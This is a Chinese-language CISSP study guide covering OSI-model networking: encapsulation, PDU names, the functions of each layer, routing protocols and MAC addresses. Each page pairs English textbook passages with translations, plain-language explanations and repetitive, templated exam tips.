分层:分层把控制按层排列,让攻击者必须连续突破。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 722 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
分层 分层把控制按层排列,让攻击者必须连续突破。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 05 / PDF P723

第 723 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The term decapsulation is sometimes used, but the term used by the Internet Engineering Task Force (IETF) is deencapsulation. 1. The Application Layer receives data from software. The Application Layer encapsulates the message by adding information to it. Information is usually added only at the beginning of the message (called a header); however, some layers also add material at the end of the message (called a footer), as shown in Figure 11.2. The Application Layer passes the encapsulated message to the Presentation Layer. FIGURE 11.2 OSI model encapsulation 2.

The process of passing the message down and adding layer-specific information continues until the message reaches the Physical Layer. 3. At the Physical Layer, the message is converted into signals that represent bits and is transmitted over the physical connection. 4. The receiving computer captures the bits from the physical connection, re-creates the message in the Physical Layer, and sends the message up to the Data Link Layer.

中文直译 / 整理

有时会使用术语解封装,但互联网工程任务组(IETF)使用的术语是去 封装。 1. 应用层从软件接收数据。 应用层通过添加信息来封装消息。 信息通常只添 加在消息的开头(称为头部); 然而,某些层也会在消息的末尾添加内容 (称为尾部),如图11.2所示。 应用层将封装后的消息传递给表示层。 图11.2 OSI模型封装 2. 将消息向下传递并添加特定层信息的过程持续进行,直到消息到达物理 层。 3. 在物理层,消息被转换为表示比特的信号,并通过物理连接传输。 4. 接收计算机从物理连接中捕获比特,在物理层重新创建消息,并将消息 向上发送到数据链路层。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 723 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 06 / PDF P724

第 724 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

5. The Data Link Layer strips its information and sends the message up to the Network Layer. 6. This process of deencapsulation is performed until the message reaches the Application Layer. 7. When the message reaches the Application Layer, the data in the message is sent to the intended software recipient. The information removed by each layer contains instructions, checksums, and so on that can be understood only by the peer layer that originally added or created the information (see Figure 11.3). This is known as peer-layer communication.

FIGURE 11.3 The OSI model peer layer logical channels The data sent into the protocol stack at the Application Layer (Layer 7) is encapsulated into a network container. The protocol data unit (PDU) is then passed down to the Presentation Layer (Layer 6), which in turn passes it down to the Session Layer (Layer 5). This network container is known as the PDU at Layers 7, 6, and 5. Once the network container reaches the Transport 5.

中文直译 / 整理

数据链路层剥离其信息,并将消息发送到网络层。 6. 这种解封装过程一直执行,直到消息到达应用层。 7. 当消息到达应用层时,消息中的数据会被发送给目标软件接收方。 每一层移除的信息包含仅由最初添加或创建该信息的对等层才能理解的指令、 校验和等(参见图 11.3)。 这被称为对等层通信。 图 11.3 OSI 模型的对等层逻辑通道 在应用层(第7层)发送到协议栈的数据被封装成一个网络容器。 协议数据单 元(PDU)随后被传递到表示层(第6层),再由表示层传递到会话层(第5层)。 这个网络容器在第7、6和5层被称为PDU。 当网络容器到达传输

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 724 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 07 / PDF P725

第 725 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Layer (Layer 4) it is then called a segment (TCP) or a datagram (User Datagram Protocol [UDP]). In the Network Layer (Layer 3), it is called a packet. In the Data Link Layer (Layer 2), it is called a frame. In the Physical Layer (Layer 1), the network container is converted into bits for transmission over the physical connection medium. Figure 11.4 shows the label applied to the network container at each layer.

FIGURE 11.4 OSI model layer-based network container names OSI Layers Understanding the functions and responsibilities of each layer of the OSI model will help you understand how network communications function, how attacks can be perpetrated, and how security can be implemented to protect network communications.

中文直译 / 整理

层(第4层)时,它被称为段(TCP)或数据报(用户数据报协议[UDP])。 在网络层(第3层),它被称为数据包。 在数据链路层(第2层),它被称为帧。 在物理层(第1层),网络容器被转换为比特,以便通过物理连接介质进行传输。 图11.4展示了每一层对网络容器所应用的标签。 图 11.4基于 OSI 模型层的网络容器名称 OSI 层 理解OSI模型每一层的功能和职责将有助于您了解网络通信的工作原理、攻击 如何实施,以及如何实施安全措施以保护网络通信。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 725 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 08 / PDF P726

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Remember the OSI Mnemonics can help you remember the layers of the OSI model in order: Application, Presentation, Session, Transport, Network, Data Link, and Physical (top to bottom). Examples include: “Please Do Not Teach Surly People Acronyms” (Physical Layer up to the Application Layer) and “All Presidents Since Truman Never Did Pot” (Application Layer down to Physical Layer). Application Layer The Application Layer (Layer 7) is responsible for interfacing user applications, network services, or the operating system with the protocol stack.

The software application is not located within this layer; rather, the protocols and services required to transmit files, exchange messages, connect to remote terminals, and so on are found here. Presentation Layer The Presentation Layer (Layer 6) is responsible for transforming data into a format that any system following the OSI model can understand. It imposes common or standardized structure and formatting rules onto the data. The Presentation Layer is also responsible for encryption and compression. On TCP/IP networks, there is no actual Presentation Layer.

There is no current need to reformat data for network transport, and protocol-stack compression only occurs in concert with some encryption operations. Encryption in relation to network communication can occur in at least five locations: Pre-network encryption, where the software encrypts prior to sending the data into the Application Layer Transport Layer encryption typically performed by TLS VPN encryption, which can occur at Layer 2, 3, or 4 depending on the VPN technology in use (such as L2TP, IPSec, OpenVPN [i.e., TLS VPN], respectively) Wireless encryption at the Data Link Layer

中文直译 / 整理

记住OSI 助记符可以帮助您按顺序记住OSI模型的各层:应用层、表示层、会话层、 传输层、网络层、数据链路层和物理层(从上到下)。 示例包括:" Please Do Not Teach Surly People Acronyms"(从物理层到应用层) 和"All Presidents Since Truman Never Did Pot"(从应用层到物理层)。 应用层 应用层(第7层)负责将用户应用程序、网络服务或操作系统与协议栈进行接 口连接。 软件应用程序本身并不位于这一层; 相反,传输文件、交换消息、连 接远程终端等所需的协议和服务都位于这一层。 表示层 表示层(第6层)负责将数据转换为任何遵循OSI模型的系统都能理解的格式。 它对数据施加通用或标准化的结构和格式规则。 表示层还负责加密和压缩。 在TCP/IP网络中,并不存在实际的表示层。 目前无需对数据进行重新格式 化以适应网络传输,协议栈的压缩仅在与某些加密操作协同时发生。

与网络 通信相关的加密可以在至少五个位置进行: 网络前加密,软件在发送前对数据进行加密 进入应用层 传输层加密通常由TLS执行 VPN加密可在第2、3或4层发生,具体取决于 正在使用的VPN技术(例如L2TP、IPSec、OpenVPN [即TLS VPN], 相应地) 数据链路层的无线加密

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 09 / PDF P727

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Bulk encryption at the Physical Layer (provided by a device external to the network interface card [NIC]) Many technologies provide encrypted connectivity to individual services or entire systems, such as remote desktop solutions and HTML5. Some entities label these capabilities as VPNs, but they are not VPNs. HTML5 is the encoding language for HTML documents, which is then interpreted by a browser. While it does support capabilities that are similar to a VPN, it is not a true VPN. Session Layer The Session Layer (Layer 5) is responsible for establishing, maintaining, and terminating communication sessions between two computers.

It manages dialog discipline or dialog control (simplex, half-duplex, full-duplex), establishes checkpoints for grouping and recovery, and retransmits PDUs that have failed or been lost since the last verified checkpoint. On TCP/IP networks, there is no actual Session Layer. Session Layer functions are handled by TCP at the Transport Layer or not at all when UDP is in use.

Communication sessions can operate in one of three different discipline or control modes: Simplex: One-way communication (as a sender or receiver, but not both) Half-Duplex: Two-way communication, but only one direction can send or receive data at a time Full-Duplex: Two-way communication, in which data can be sent and received in both directions simultaneously Transport Layer

中文直译 / 整理

物理层的批量加密(由网络接口卡 [NIC] 外部的设备提供) 许多技术为单个服务或整个系统提供加密连接,例如远程桌面解决方 案和HTML5。 一些实体将这些功能称为VPN,但它们并非VPN。 HTML5是HTML文档的编码语言,随后由浏览器解释。 尽管它支持类似于 VPN的功能,但它并非真正的VPN。 会话层 会话层(第5层)负责在两台计算机之间建立、维护和终止通信会话。 它管理 对话纪律或对话控制(单工、半双工、全双工), 建立检查点以进行分组和恢复,并重传自上次验证检查点以来失败或丢失的PDU。 在TCP/IP网络中,不存在实际的会话层。 会话层功能由传输层的TCP处理, 或在使用UDP时完全不处理。 通信会话可以以以下三种不同的纪律或控制模式之一运行: 单工:单向通信(作为发送方或接收方,但不能同时进行) 半双工:双向通信,但同一时间只能有一个方向发送或接收数据 全双工:双向通信,数据可在两个方向上同时发送和接收 传输层

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

考试常让你把协议、端口、层次对应起来。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 10 / PDF P728

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

The Transport Layer (Layer 4) is responsible for managing the integrity of a connection and controlling the session. The Transport Layer establishes communications between nodes (also known as devices) and defines the rules of a session. Session rules specify how much data each segment can contain, how to verify message integrity, and how to determine whether data has been lost. Session rules are established through a handshaking process.

(Please see the section “Transport Layer Protocols,” later in this chapter, for the discussion of the SYN/ACK three-way handshake of TCP.) The Transport Layer establishes a logical connection between two devices and provides end-to-end transport services to support data delivery. This layer includes mechanisms for segmentation, sequencing, error checking, controlling the flow of data, error correction, multiplexing, and network service optimization.

The following protocols operate within the Transport Layer: Transmission Control Protocol (TCP) User Datagram Protocol (UDP) Transport Layer Security (TLS) Since the actual TCP/IP protocol stack does not functionally have a presentation or session layer, as defined by the OSI model, some of the features of those “missing” layers are handled in the Transport Layer by TCP. Network Layer The Network Layer (Layer 3) is responsible for logical addressing and performing routing. Logical addressing occurs when an address is assigned and used by software or a protocol rather than being provided and controlled by hardware.

The Network Layer's packet header includes the source and destination IP addresses. The Network Layer is responsible for providing routing or delivery guidance, but it is not responsible for verifying guaranteed delivery. The Network Layer also manages error detection and node data traffic (i.e., traffic control).

中文直译 / 整理

传输层(第4层)负责管理连接的完整性并控制会话。 传输层在节点(也称为 设备)之间建立通信,并定义会话的规则。 会话规则规定每个段可以包含多少 数据、如何验证消息完整性以及如何确定数据是否丢失。 会话规则通过握手过 程建立。 (有关TCP的SYN/ACK三次握手的讨论,请参见本章后面“传输层 协议”部分。 ) 传输层在两个设备之间建立逻辑连接,并提供端到端的传输服务以支持数据传 输。 该层包括分段、排序、错误检查、流量控制、错误纠正、多路复用和网络 服务优化等机制。 以下协议在传输层中运行: 传输控制协议(TCP) 用户数据报协议(UDP) 传输层安全(TLS) 由于实际的TCP/IP协议栈在功能上没有OSI模型所定义的表示层和 会话层,因此这些“缺失”层的某些功能由TCP在传输层中处理。 网络层 网络层(第3层)网络层(第3层)负责逻辑寻址和路由。 逻辑寻址是指地址由 软件或协议分配和使用,而非由硬件提供和控制。 网络层的数据包头部包含源 IP地址和目的IP地址。 网络层负责提供路由或传输指导,但不负责验证可靠传输。 网络层还管理错误 检测和节点数据流量(即流量控制)。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 11 / PDF P729

第 729 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Non-IP, or Legacy, Protocols Non-IP protocols are protocols that serve as an alternative to IP at the OSI Network Layer (3). With the dominance and success of TCP/IP, nonIP protocols (i.e., legacy protocols) have become the purview of specialpurpose networks, such as IPX/SPX, AppleTalk, and NetBEUI. Because non-IP protocols are rare, most firewalls are unable to perform packet header, address, or payload content filtering on those protocols. Also, non-IP protocols can be encapsulated in IP to be communicated across the Internet. Thus, legacy protocols need to be blocked. A router is the primary network hardware device that functions at Layer 3.

Routers determine the best logical path for the transmission of packets based on speed, hops, preference, and so on. Routers use the destination IP address to guide the transmission of packets. A routed protocol is a Network Layer protocol whose communications are controlled by routers and their routing tables. Routers maintain a routing table that includes information about known subnets and the pathway to reach those subnets. The routing table information is used to direct the traffic of a routed protocol to its destination.

中文直译 / 整理

非IP协议或传统协议 非IP协议是作为OSI网络层(第3层)中IP协议替代方案的协议。 由于 TCP/IP的主导地位和成功,非IP协议(即遗留协议)已成为专用网络的范 畴,例如IPX/SPX、AppleTalk和NetBEUI。 由于非IP协议极为罕见,大 多数防火墙无法对这些协议执行数据包头部、地址或负载内容过滤。 此外, 非IP协议可以被封装在IP中以通过互联网传输。 因此,需要阻止遗留协议。 路由器是工作在第3层的主要网络硬件设备。 路由器根据速度、跳数、优先级等 因素确定数据包传输的最佳逻辑路径。 路由器使用目的IP地址来引导数据包的 传输。 一种路由协议是一种网络层协议,其通信由路由器及其路由表控制。 路 由器维护一个路由表,其中包含有关已知子网及到达这些子网路径的信息。 路 由表信息用于将路由协议的流量导向其目的地。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

防火墙:防火墙根据规则控制网络流量进出。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 729 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 12 / PDF P730

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Routing Protocols There are two broad categories of interior routing protocols: distance vector and link state. Distance vector routing protocols maintain a list of destination networks along with metrics of direction and distance as measured in hops (in other words, the number of routers to cross to reach the destination). Link state routing protocols gather router characteristics, such as speed, latency, error rates, and actual monetary cost for use. This information is tabulated to make a next hop routing decision. Common examples of distance vector routing protocols are Routing Information Protocol (RIP) and Interior Gateway Routing Protocol (IGRP).

Common examples of link state routing protocols are Open Shortest Path First (OSPF) and Intermediate System to Intermediate System (IS-IS). There is also a commonly used advanced distance vector routing protocol that replaces IGRP: Enhanced Interior Gateway Routing Protocol (EIGRP). There is one main category of exterior routing protocols that is called path vector. Path vector routing protocols make next hop decisions based on the entire remaining path (i.e., vector) to the destination. This is distinct from interior routing protocols, which make next hop decisions based solely on information related to that next immediate hop.

Interior routing protocols are myopic, whereas exterior routing protocols are farsighted. The primary example of a path vector protocol is Border Gateway Protocol (BGP). BGP maintains a routing table of the autonomous systems (AS) across the Internet. An autonomous system (AS) is a collection of IP networks and routers under the control of a single organization that presents a common routing policy to the Internet. Route security can be enforced by configuring routers to accept route updates only from other authenticated routers. Administrative access to a router should be limited physically and logically to only specific authorized entities.

It is also important to keep router firmware updated. Data Link Layer The Data Link Layer (Layer 2) is responsible for formatting the packet for transmission. The proper format is determined by the hardware, topology, and technology of the network, such as Ethernet (IEEE 802.3).

中文直译 / 整理

路由协议 Interior routing protocols分为两大类:距离矢量和链路状态。 距离矢 量路由协议维护一份目标网络列表,以及以跳数(即到达目的地所需经过 的路由器数量)衡量的方向和距离度量值。 链路状态路由协议收集路由器 特性,例如速度、延迟、错误率和实际货币成本以供使用。 这些信息被汇 总以做出下一跳路由决策。 距离矢量路由协议的常见示例包括路由信息协 议(RIP)和内部网关路由协议(IGRP)。 链路状态路由协议的常见示例 包括开放最短路径优先(OSPF)和中间系统到中间系统(IS-IS)。 还有 一种常用的高级距离矢量路由协议取代了IGRP:增强型内部网关路由协议 (EIGRP)。 有一种主要类别的外部路由协议称为路径向量。 路径向量路由协议根据到目 的地的完整剩余路径(即向量)来决定下一跳。 这与内部路由协议不同,内 部路由协议仅基于与下一跳直接相关的信息来决定下一跳。 内部路由协议是 短视的,而外部路由协议是远见的。 路径向量协议的主要示例是边界网关协 议(BGP)。 BGP维护互联网上自治系统(AS)的路由表。

自治系统( AS)是指由单个组织控制的一组IP网络和路由器,它们向互联网呈现统一 的路由策略。 可以通过配置路由器仅接受来自其他经过身份验证的路由器的路由更新来 强制实施路由安全。 对路由器的管理访问应通过物理和逻辑方式仅限于特 定授权实体。 同时,保持路由器固件更新也非常重要。 数据链路层 数据链路层(第2层)Data Link Layer (Layer 2)负责将数据包格式化以便传输。 正确的格式由网络的硬件、拓扑结构和技术决定,例如以太网(IEEE 802.3)。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 13 / PDF P731

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Part of the processing performed on the network container within the Data Link Layer includes adding the source and destination hardware addresses to the frame. The hardware address is the Media Access Control (MAC) address, which is a 6-byte (48-bit) binary address written in hexadecimal notation (for example, 00-13-02-1F-58-F5). This address is also known as the physical address, the NIC address, and the Ethernet address. The first 3 bytes (24 bits) of the address is the organizationally unique identifier (OUI), which denotes the vendor or manufacturer of the physical network interface.

OUIs are registered with the Institute of Electrical and Electronics Engineers (IEEE), which controls their issuance. The OUI can be used to discover the manufacturer of a NIC through the IEEE website at http://standards.ieee.org/products-services/regauth/index.html. The last 3 bytes (24 bits) of the MAC address represent a unique number assigned to that interface by the manufacturer. Some manufacturers will encode information into these final 24 bits, which may represent the make, model, and production run along with a unique value. Thus, some devices (such as mobile devices, IoT equipment, and embedded systems) that use a unique NIC can be identified by their MAC addresses.

Among the protocols at the Data Link Layer (Layer 2) of the OSI model, you should be familiar with Address Resolution Protocol (ARP). See the section “ARP Concerns” later in this chapter. Network hardware devices that function at Layer 2, the Data Link Layer, are switches and bridges. These devices support MAC-based traffic routing. Switches receive a frame on one port and send it out another port based on the destination's MAC address. MAC address destinations are used to determine whether a frame is transferred over the bridge from one network segment to another.

